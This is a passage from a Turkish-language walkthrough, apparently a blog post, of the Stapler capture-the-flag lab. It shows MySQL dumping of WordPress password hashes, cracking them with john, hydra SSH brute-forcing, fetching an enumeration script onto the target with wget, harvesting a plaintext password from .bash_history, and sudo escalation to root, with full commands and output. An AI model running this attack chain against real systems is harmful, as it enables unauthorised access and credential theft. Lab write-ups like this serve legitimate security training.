|  7 | harry      | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 | harry         | [email protected]   |                  | 2016-06-05 16:18:41 |                     |           0 | harry           |
|  8 | scott      | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 | scott         | [email protected]   |                  | 2016-06-05 16:18:59 |                     |           0 | scott           |
|  9 | kathy      | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 | kathy         | [email protected]   |                  | 2016-06-05 16:19:14 |                     |           0 | kathy           |
| 10 | tim        | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 | tim           | [email protected]     |                  | 2016-06-05 16:19:29 |                     |           0 | tim             |
| 11 | ZOE        | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 | zoe           | [email protected]     |                  | 2016-06-05 16:19:50 |                     |           0 | ZOE             |
| 12 | Dave       | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. | dave          | [email protected]    |                  | 2016-06-05 16:20:09 |                     |           0 | Dave            |
| 13 | Simon      | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 | simon         | [email protected]   |                  | 2016-06-05 16:20:35 |                     |           0 | Simon           |
| 14 | Abby       | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. | abby          | [email protected]    |                  | 2016-06-05 16:20:53 |                     |           0 | Abby            |
| 15 | Vicki      | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 | vicki         | [email protected]   |                  | 2016-06-05 16:21:14 |                     |           0 | Vicki           |
| 16 | Pam        | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 | pam           | [email protected]     |                  | 2016-06-05 16:42:23 |                     |           0 | Pam             |
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
16 rows in set (0.002 sec)

MySQL [wordpress]> select concat_ws(‘:’, user_login, user_pass) from wp_users;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ':’, user_login, user_pass) from wp_users' at line 1
MySQL [wordpress]> select concat_ws(':', user_login, user_pass) from wp_users;
+--------------------------------------------+
| concat_ws(':', user_login, user_pass)      |
+--------------------------------------------+
| John:$P$B7889EMq/erHIuZapMB8GEizebcIy9.    |
| Elly:$P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0    |
| Peter:$P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0   |
| barry:$P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0   |
| heather:$P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 |
| garry:$P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1   |
| harry:$P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0   |
| scott:$P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1   |
| kathy:$P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0   |
| tim:$P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0     |
| ZOE:$P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1     |
| Dave:$P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy.    |
| Simon:$P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0   |
| Abby:$P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs.    |
| Vicki:$P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131   |
| Pam:$P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0     |
+--------------------------------------------+
16 rows in set (0.002 sec)

Burdan ve smb ile ede ettiğim kullanıcılardan bir users dosyası oluşturdum. Daha sonrasında phpass forrmatındaki hash'leri kırmak içinjohn kullandım.

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# john hash --wordlist=/usr/share/wordlists/rockyou.txt --rules --format=phpass
Using default input encoding: UTF-8
Loaded 16 password hashes with 16 different salts (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cookie           (scott)
monkey           (harry)
football         (garry)
coolgirl         (kathy)
washere          (barry)
incorrect        (John)
thumb            (tim)
0520             (Pam)
passphrase       (heather)
damachine        (Dave)
ylle             (Elly)
┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# cat users 
elly
NATHAN
zoe
kai
mel
Taylor
SHAY
jess
Drew
Sam
jamie
JLipps
LSolum2
Eeth
CJoo
JKanode
CCeaser
SStroud
MFrei
IChadwick
JBare
MBassin
SHayslett
AParnell
DSwanger
ETollefson
RNunemaker
peter
root

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# cat pass 
cookie
monkey
football
coolgirl
washere
incorrect
thumb
0520
plbkac

ssh servisinn açık olduğunu biliyoruz hydra ile elimizdeki bilgilerle bir saldırı başlattım.

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# hydra -L users -P pass  ssh://192.168.0.25 -e nsr >> hydra_result

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# cat hydra_result
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-30 14:56:40
[DATA] max 16 tasks per 1 server, overall 16 tasks, 348 login tries (l:29/p:12), ~22 tries per task
[DATA] attacking ssh://192.168.0.25:22/
[22][ssh] host: 192.168.0.25   login: zoe   password: plbkac
[22][ssh] host: 192.168.0.25   login: zoe   password: plbkac
[STATUS] 115.00 tries/min, 115 tries in 00:01h, 235 to do in 00:03h, 16 active
[22][ssh] host: 192.168.0.25   login: JBare   password: cookie
[22][ssh] host: 192.168.0.25   login: SHayslett   password: SHayslett
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-30 14:59:35

Harika artık ssh bağlantısı yapabiliriz.

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# ssh [email protected]                                                                                                                                                                                                             255 ⨯
-----------------------------------------------------------------
~          Barry, don't forget to put a message here           ~
-----------------------------------------------------------------
[email protected]'s password: 
Welcome back!

JBare@red:~$ whoami
JBare
JBare@red:~$ cd /tmp/

Bu noktadan sonra https://github.com/kudayDOTsite/linux-smart-enumeration projesi ile enum işlemi gerçekleştreceğim. İlgili sh doyasını hedef makineye kopyaladım.

JBare@red:/tmp$ wget http://192.168.0.21:1822/lse.sh
--2021-05-30 23:03:57--  http://192.168.0.21:1822/lse.sh
Connecting to 192.168.0.21:1822... connected.
HTTP request sent, awaiting response... 200 OK
Length: 41177 (40K) [text/x-sh]
Saving to: ‘lse.sh’

lse.sh                                                      100%[========================================================================================================================================>]  40.21K  --.-KB/s    in 0s      

2021-05-30 23:03:57 (199 MB/s) - ‘lse.sh’ saved [41177/41177]

JBare@red:/tmp$ chmod 777 lse.sh

Ve başlattım.

JBare@red:/tmp$ ./lse.sh -l2  >> result.txt
If you know the current user password, write it here to check sudo privileges: cookie

Bu gösterdiğim ekran görüntüsü sonuçlarıns adece küçük bir bölümü:

[!] fst050 Uncommon setgid binaries........................................ skip
[!] fst060 Can we write to any setgid binary?.............................. skip
[*] fst070 Can we read /root?.............................................. nope
[*] fst080 Can we read subdirectories under /home?......................... yes!
---
total 24
drwxr-xr-x  2 AParnell AParnell 4096 Jun  5  2016 .
drwxr-xr-x 32 root     root     4096 Jun  4  2016 ..
-rw-r--r--  1 root     root        5 Jun  5  2016 .bash_history
-rw-r--r--  1 AParnell AParnell  220 Sep  1  2015 .bash_logout
-rw-r--r--  1 AParnell AParnell 3771 Sep  1  2015 .bashrc
-rw-r--r--  1 AParnell AParnell  675 Sep  1  2015 .profile
total 24
drwxr-xr-x  2 CCeaser CCeaser 4096 Jun  5  2016 .
drwxr-xr-x 32 root    root    4096 Jun  4  2016 ..
-rw-r--r--  1 root    root      10 Jun  5  2016 .bash_history
-rw-r--r--  1 CCeaser CCeaser  220 Sep  1  2015 .bash_logout
-rw-r--r--  1 CCeaser CCeaser 3771 Sep  1  2015 .bashrc
-rw-r--r--  1 CCeaser CCeaser  675 Sep  1  2015 .profile
total 24
drwxr-xr-x  2 CJoo CJoo 4096 Jun  5  2016 .
drwxr-xr-x 32 root root 4096 Jun  4  2016 ..
-rw-r--r--  1 root root    5 Jun  5  2016 .bash_history
-rw-r--r--  1 CJoo CJoo  220 Sep  1  2015 .bash_logout
-rw-r--r--  1 CJoo CJoo 3771 Sep  1  2015 .bashrc
-rw-r--r--  1 CJoo CJoo  675 Sep  1  2015 .profile
total 24
drwxr-xr-x  2 DSwanger DSwanger 4096 Jun  5  2016 .
drwxr-xr-x 32 root     root     4096 Jun  4  2016 ..
-rw-r--r--  1 root     root        5 Jun  5  2016 .bash_history
-rw-r--r--  1 DSwanger DSwanger  220 Sep  1  2015 .bash_logout
-rw-r--r--  1 DSwanger DSwanger 3771 Sep  1  2015 .bashrc
-rw-r--r--  1 DSwanger DSwanger  675 Sep  1  2015 .profile

Bütün kullanıcıların altında .bash_history'i görebiliyoruz ve root haklarında. Bunun üzerine aşağdıki gibi bir işlem gerçekletirdim.

JBare@red:/home$ ls -l
total 120
drwxr-xr-x 2 AParnell   AParnell   4096 Jun  5  2016 AParnell
drwxr-xr-x 2 CCeaser    CCeaser    4096 Jun  5  2016 CCeaser
drwxr-xr-x 2 CJoo       CJoo       4096 Jun  5  2016 CJoo
drwxr-xr-x 2 Drew       Drew       4096 Jun  5  2016 Drew
drwxr-xr-x 2 DSwanger   DSwanger   4096 Jun  5  2016 DSwanger
drwxr-xr-x 2 Eeth       Eeth       4096 Jun  5  2016 Eeth
drwxr-xr-x 2 elly       elly       4096 Jun  5  2016 elly
drwxr-xr-x 2 ETollefson ETollefson 4096 Jun  5  2016 ETollefson
drwxr-xr-x 2 IChadwick  IChadwick  4096 Jun  5  2016 IChadwick
drwxr-xr-x 2 jamie      jamie      4096 Jun  5  2016 jamie
drwxr-xr-x 3 JBare      JBare      4096 May 30 22:24 JBare
drwxr-xr-x 2 jess       jess       4096 Jun  5  2016 jess
drwxr-xr-x 2 JKanode    JKanode    4096 Jun  5  2016 JKanode
drwxr-xr-x 2 JLipps     JLipps     4096 Jun  5  2016 JLipps
drwxr-xr-x 2 kai        kai        4096 Jun  5  2016 kai
drwxr-xr-x 2 LSolum     LSolum     4096 Jun  5  2016 LSolum
drwxr-xr-x 2 LSolum2    LSolum2    4096 Jun  5  2016 LSolum2
drwxr-xr-x 2 MBassin    MBassin    4096 Jun  5  2016 MBassin
drwxr-xr-x 2 mel        mel        4096 Jun  5  2016 mel
drwxr-xr-x 2 MFrei      MFrei      4096 Jun  5  2016 MFrei
drwxr-xr-x 2 NATHAN     NATHAN     4096 Jun  5  2016 NATHAN
drwxr-xr-x 3 peter      peter      4096 Jun  3  2016 peter
drwxr-xr-x 2 RNunemaker RNunemaker 4096 Jun  5  2016 RNunemaker
drwxr-xr-x 2 Sam        Sam        4096 Jun  5  2016 Sam
drwxr-xr-x 2 SHAY       SHAY       4096 Jun  5  2016 SHAY
drwxr-xr-x 3 SHayslett  SHayslett  4096 May 30 22:24 SHayslett
drwxr-xr-x 2 SStroud    SStroud    4096 Jun  5  2016 SStroud
drwxr-xr-x 2 Taylor     Taylor     4096 Jun  5  2016 Taylor
drwxrwxrwx 2 www        www        4096 Jun  5  2016 www
drwxr-xr-x 3 zoe        zoe        4096 May 30 22:57 zoe
JBare@red:/home$ cat AParnell/.bash
cat: AParnell/.bash: No such file or directory
JBare@red:/home$ cat AParnell/.bash_history 
exit
JBare@red:/home$ cat CCeaser/.bash_history 
free
exit
JBare@red:/home$ cat CJoo/.bash_history 
exit
JBare@red:/home$ cat Drew/.bash_history 
exit
JBare@red:/home$ cat DSwanger/.bash_history 
exit
JBare@red:/home$ cat Eeth/.bash_history 
exit
JBare@red:/home$ cat elly/.bash_history 
exit
JBare@red:/home$ cat ETollefson/.bash_history 
exit
JBare@red:/home$ cat IChadwick/.bash_history 
exit
JBare@red:/home$ cat jamie/.bash_history 
top
ps aux
exit
JBare@red:/home$ cat JBare/.bash_history 
exit
JBare@red:/home$ cat jess/.bash_history 
exit
JBare@red:/home$ cat JKanode/.bash_history 
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
JBare@red:/home$ 

Bu harika çünkü lse.sh scripttini çalıştırdığımda bana şöyle bir bilgide vermişti.

[*] usr020 Are there other users in an administrative groups?.............. yes!
---
sudo:x:27:peter
---
[*] usr030 Other users with shell.......................................... yes!
---

peter kullanıcısı sudo grubunun bir parçası.! Bunun üzerine peter kullanıcısına geçiş yaptım.

JBare@red:/home$ su peter
Password: 

This is the Z Shell configuration function for new users,
zsh-newuser-install.
You are seeing this message because you have no zsh startup files
(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
~).  This function can help you with a few settings that should
make your use of the shell easier.

You can:

(q)  Quit and do nothing.  The function will be run again next time.

(0)  Exit, creating the file ~/.zshrc containing just a comment.
     That will prevent this function being run again.

(1)  Continue to the main menu.

(2)  Populate your ~/.zshrc with the configuration recommended
     by the system administrator and exit (you will need to edit
     the file by hand, if so desired).

--- Type one of the keys in parentheses --- 

Aborting.
The function will be run again next time.  To prevent this, execute:
  touch ~/.zshrc
red% ls
AParnell  CCeaser  CJoo  Drew  DSwanger  Eeth  elly  ETollefson  IChadwick  jamie  JBare  jess  JKanode  JLipps  kai  LSolum  LSolum2  MBassin  mel  MFrei  NATHAN  peter  RNunemaker  Sam  SHAY  SHayslett  SStroud  Taylor  www  zoe
red% whoami
peter
red% 

Okay! Hadi işi tamamlayalım.

red% whoami
peter
red% id
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
red% sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for peter: 
Sorry, try again.
[sudo] password for peter: 
➜  /home whoami
root
➜  /home cd /root 
➜  ~ ls
fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql
➜  ~ cat flag.txt 
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                          .-'''''-.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)  
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b

Not:
Çözüm esnasında aşağıdaki çıktılarla yetki yükseltme exploitleri denedim ancak bir sonuca ulaşamdım. Halbu ki sürümler son derece uygundu...

➜  ~ uname -a
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
➜  ~ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04 LTS
Release:    16.04
Codename:   xenial
└─# searchsploit ubuntu linux kernel Local Privilege 4.4
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                             |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit)                                                                                                                            | linux/local/40759.rb
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation                                                                                                           | linux_x86-64/local/40871.c
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation                                                                                                                                        | linux/local/41458.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds Privilege Escalation                                                                                                    | linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Privilege Escalation                                                                                                | windows_x86-64/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation                                                                                                               | linux/local/39772.txt
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                                                                                                                              | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                                                                                                                                     | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation                                                                                                          | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)                                                                                                      | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP)                                                                                  | linux/local/47169.c
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Kategori:Walkthrough

İlk Yorumu Siz Yapın

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir